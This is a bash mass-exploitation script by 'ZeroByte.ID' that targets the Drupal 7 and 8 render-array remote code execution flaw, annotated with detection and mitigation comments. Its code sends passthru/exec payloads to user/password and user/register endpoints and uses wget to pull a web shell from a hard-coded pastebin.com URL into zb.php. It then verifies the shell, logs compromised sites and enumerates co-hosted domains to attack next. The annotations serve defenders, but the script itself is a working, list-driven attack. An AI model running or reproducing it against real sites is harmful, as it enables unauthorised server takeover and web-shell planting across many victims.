- #!/bin/bash
- # AutoExploit [BOT]
- # Remote Code Execute CMS Drupal 7.x - 8 + Reverse IP
- # Date : 22 - Apr - 2018
- # Usage : ./rce.sh list.txt
- # Coded by ZeroByte.ID
# Fixed, browser-like User-Agent value handed to curl via -A in drupal7().
# Defender note: a hard-coded string like this is at best a weak log indicator;
# it is trivially changed, so match on the request pattern rather than on it.
- useragent="Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0";
# reverse: reverse-IP enumeration helper. Resolves the value passed as $1 with
# dig and asks the hackertarget.com reverse-IP API which names share that
# address.
# Arguments: $1 - host to resolve (drupal7/drupal8 pass their target as-is)
# Outputs:   one status line on stdout; de-duplicated names appended to
#            domains.tmp (domain.tmp and domains2.tmp are scratch files)
# Returns:   1 when the API answers "No records found" or "error check";
#            the rate-limit branch sleeps and then exits the whole script
# Defender note: the callers invoke this only after an upload check succeeded,
# so names co-hosted with a compromised site are what ends up in domains.tmp.
# Nothing in this listing reads that file back. Sites sharing an IP with a
# compromised Drupal host should be reviewed as well.
- reverse() {
- target=$1
- getip=$(dig +short $1);
- check=$(curl -s https://api.hackertarget.com/reverseiplookup/?q=${getip});
# The API reply is classified by substring match on its text.
- if [[ $check =~ 'No records found' ]]; then
- echo "[BAD] $getip";
- return 1
- elif [[ $check =~ 'error check' ]]; then
- echo "[BAD] $getip";
- return 1
- elif [[ $check =~ 'API count exceeded' ]]; then
# Rate limited. The Indonesian messages say the bot is resting, should not be
# stopped, and is on a coffee break of roughly ten minutes.
- echo "[WAITING]"
- echo "ROBOT BUTUH ISTIRAHAT BENTARAN!";
- echo "[JANGAN DI STOP!]";
- echo "GUA LAGI NGOPI KURANG LEBIH 10 Menit";
- sleep 10m;
# exit (not return): the whole run ends here after the wait.
- exit
- else
# The same lookup is requested a second time and its output saved to disk.
- curl -s https://api.hackertarget.com/reverseiplookup/?q=${getip} >> domain.tmp
- sleep 0.5s
- list=$(cat domain.tmp | wc -l);
# Strip www./mail. prefixes, then de-duplicate into the cumulative domains.tmp.
- cat domain.tmp | sed 's|www.||g' | sed 's|mail.||g' >> domains2.tmp
- sort domains2.tmp | uniq >> domains.tmp
- echo "[OK] $getip and $list site";
- sleep 0.6s
- rm domain.tmp
- rm domains2.tmp
- fi
- }
# drupal7: probes one site for the Drupal 7 remote code execution named in the
# file header and, when the probe succeeds, tries to place a PHP file named
# zb.php on the server.
# Arguments: $1 - base URL of the site
# Files:     cookie.tmp (curl cookie jar), result.txt (confirmed hits),
#            gagal-upload.txt ("gagal" = failed; target logged when the
#            sites/default/files check does not find the marker)
# Calls:     reverse on a confirmed sites/default/files upload; drupal8 when
#            the Drupal 7 probe does not succeed
# Detection: the request pair is distinctive in web access logs - a POST to
#   ?q=user/password whose query string carries name[%23post_render][]=passthru
#   (%23 is "#"), followed by a POST to ?q=file/ajax/name/%23value/form-...
#   On disk, look for an unexpected zb.php in the document root or in
#   sites/default/files, and for outbound fetches from the web server to
#   pastebin.com.
# Mitigation: apply the Drupal core security update that fixes this render
#   array issue, make sure PHP execution is disabled in the public files
#   directory, and restrict outbound HTTP from web servers.
- drupal7() {
- target=$1
- echo -ne "---";
# Probe request: the injected command is the harmless "uname -a"; only the
# presence of a form_build_id line in the reply is kept.
- cek7=$(curl -s -m 10 -X POST -A ${useragent} --cookie-jar cookie.tmp "${target}/?q=user/password&name\[%23post_render\]\[\]=passthru&name\[%23type\]=markup&name\[%23markup\]=uname+-a" --data "form_id=user_pass&_triggering_element_name=name" | grep form_build_id);
- echo -ne "-------";
- sleep 2s
- if [[ $cek7 =~ 'value="form-' ]]; then
- echo -ne "--------------------------";
# Same request again with the stored cookies, this time extracting the
# form_build_id value itself.
- token=$(curl -s -m 10 -X POST -A ${useragent} -b cookie.tmp "${target}/?q=user/password&name\[%23post_render\]\[\]=passthru&name\[%23type\]=markup&name\[%23markup\]=uname+-a" --data "form_id=user_pass&_triggering_element_name=name" | grep form_build_id | grep -Po '(?<=value=")[^" \>]*' | head -1);
- echo -ne "----------------------------------";
- echo
- sleep 2s
# Second half of the pair: the form_build_id is posted to file/ajax and the
# first line of the reply is treated as the command output.
- result=$(curl -s -m 10 -X POST -A ${useragent} -b cookie.tmp "${target}/?q=file/ajax/name/%23value/${token}" --data "form_build_id=${token}" | head -1)
# A reply containing "Linux" is taken as proof that uname ran on the server.
- if [[ $result =~ 'Linux' ]]; then
- echo "[O] VULN RCE $target : uname -a"
- echo "$result";
- echo "Proses Upload Shell ....."
- sleep 2s
# The two-request sequence is repeated with a wget command that points at the
# hard-coded pastebin.com raw URL and names zb.php in the web root.
- uploadhome=$(curl -s -m 10 -X POST -A ${useragent} -b cookie.tmp "${target}/?q=user/password&name\[%23post_render\]\[\]=passthru&name\[%23type\]=markup&name\[%23markup\]=wget+-o+zb.php+"https://pastebin.com/raw/S1c9b4ne"" --data "form_id=user_pass&_triggering_element_name=name" | grep form_build_id | grep -Po '(?<=value=")[^" \>]*' | head -1);
- curl -s -m 10 -X POST -A ${useragent} -b cookie.tmp "${target}/?q=file/ajax/name/%23value/${uploadhome}" --data "form_build_id=${uploadhome}" | head -1 > /dev/null
- sleep 5s
# Verification is a plain GET of /zb.php looking for the marker "ZeroByte.ID";
# that marker is also a usable content signature when sweeping web roots.
- cekshellhome=$(curl -s -m 10 "${target}/zb.php");
- if [[ $cekshellhome =~ 'ZeroByte.ID' ]]; then
- echo "[HOME] Upload Done"
- echo "$result" >> result.txt
- echo "$target/zb.php" | tee -a result.txt
- else
- echo "[HOME] Can't Upload"
- fi
- sleep 2s
# Second attempt, this time naming sites/default/files/zb.php.
- uploaddir=$(curl -s -m 10 -X POST -A ${useragent} -b cookie.tmp "${target}/?q=user/password&name\[%23post_render\]\[\]=passthru&name\[%23type\]=markup&name\[%23markup\]=wget+-o+sites/default/files/zb.php+"https://pastebin.com/raw/S1c9b4ne"" --data "form_id=user_pass&_triggering_element_name=name" | grep form_build_id | grep -Po '(?<=value=")[^" \>]*' | head -1);
- curl -s -m 10 -X POST -A ${useragent} -b cookie.tmp "${target}/?q=file/ajax/name/%23value/${uploaddir}" --data "form_build_id=${uploaddir}" | head -1 > /dev/null
- sleep 5s
- cekshell=$(curl -s -m 10 "${target}/sites/default/files/zb.php");
- if [[ $cekshell =~ 'ZeroByte.ID' ]]; then
- echo "[DIR WRITABLE] Upload Done"
- echo "$result" >> result.txt
- echo "$target/sites/default/files/zb.php" | tee -a result.txt
- echo "=====================================" >> result.txt
# Only this branch goes on to enumerate co-hosted names.
- reverse $target
- else
- echo "[DIR WRITABLE] Can't Upload"
- echo "$target" >> gagal-upload.txt
- fi
- echo "--------------------------------------------------------------------------"
- else
# No "Linux" in the reply: hand the same target to the Drupal 8 routine.
- echo "[X] NOT VULN $target"
- drupal8 $target
- fi
- else
# No form_build_id came back at all: hand the target to the Drupal 8 routine.
- echo
- echo "[X] NOT VULN $target";
- drupal8 $target
- fi
- }
# drupal8: Drupal 8 counterpart of drupal7, reached only as its fallback in
# this listing. Sends the render-array payload through the user registration
# AJAX endpoint, with a wget of the hard-coded pastebin.com raw URL as the
# injected command.
# Arguments: $1 - base URL of the site
# Files:     result.txt (reported hits), not-vuln.txt (targets logged by the
#            else branch)
# Detection: POSTs to /user/register with the query string
#   element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax
#   are visible in access logs; the mail[a][#post_render][]=exec part travels
#   in the request body, so it needs WAF or body-level inspection. No -A is
#   passed here, so curl's default User-Agent applies unless overridden
#   elsewhere. On disk, look for zb.php in the document root or in
#   sites/default/files.
# Mitigation: as for drupal7 - current Drupal core, no PHP execution in the
#   public files directory, restricted outbound HTTP from the web server.
- drupal8() {
- target=$1
- echo "[O] CHECKING DRUPAL 8";
- echo -ne "---";
# Both requests are sent unconditionally, one per destination path.
# -k makes curl skip TLS certificate verification.
- cek8=$(curl -s -m 10 -k "${target}/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax" --data "form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=exec&mail[a][#type]=markup&mail[a][#markup]=wget 'https://pastebin.com/raw/S1c9b4ne' -O zb.php")
- cek8_=$(curl -s -m 10 -k "${target}/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax" --data "form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=exec&mail[a][#type]=markup&mail[a][#markup]=wget 'https://pastebin.com/raw/S1c9b4ne' -O sites/default/files/zb.php")
- echo -ne "-------------------";
# The marker "ZeroByte.ID" is searched for in the two POST response bodies.
- if [[ $cek8 =~ 'ZeroByte.ID' ]]; then
- echo -ne "-------------------------------------------";
- echo "[O] Upload Done"
- echo "$target/zb.php" | tee -a result.txt
- reverse $target
- else
- if [[ $cek8_ =~ 'ZeroByte.ID' ]]; then
- echo -ne "-------------------------------------------";
- echo "[O] Upload Done"
- echo "$target/sites/default/files/zb.php" | tee -a result.txt
- fi
- echo
- echo "[X] NOT VULN $target !"
- echo -ne "-------------------------------------------------";
# Targets reaching this branch are recorded in not-vuln.txt.
- echo "$target" >> not-vuln.txt
- echo
- fi
- }
# Print the author's ASCII banner; the heredoc delimiter is quoted, so the
# text is emitted literally.
- cat << "banner"
- --------------------------------------------------
- _ _ _ _
- _______ _ __ ___ | |__ _ _| |_ ___ (_) __| |
- |_ / _ \ '__/ _ \| '_ \| | | | __/ _ \ | |/ _` |
- / / __/ | | (_) | |_) | |_| | || __/_| | (_| |
- /___\___|_| \___/|_.__/ \__, |\__\___(_)_|\__,_|
- |___/
- kUr4x
- ----------------[ RCE Drupal ]--------------------
- banner
# Main loop: each whitespace-separated entry of the list file given as $1 is
# passed to drupal7, which falls back to drupal8 by itself.
# Defender note: the run is list-driven and unattended, so the request
# patterns above tend to show up as opportunistic sweeps across many sites
# rather than as targeted activity; alert on the pattern, not on the source.
- for s in $(cat $1); do
- echo "CHECKING DRUPAL 7 $s"
- echo -ne "----";
- drupal7 $s
- done
# Only the cookie jar is deleted. result.txt, not-vuln.txt, gagal-upload.txt
# and domains.tmp stay in the operator's working directory.
- rm cookie.tmp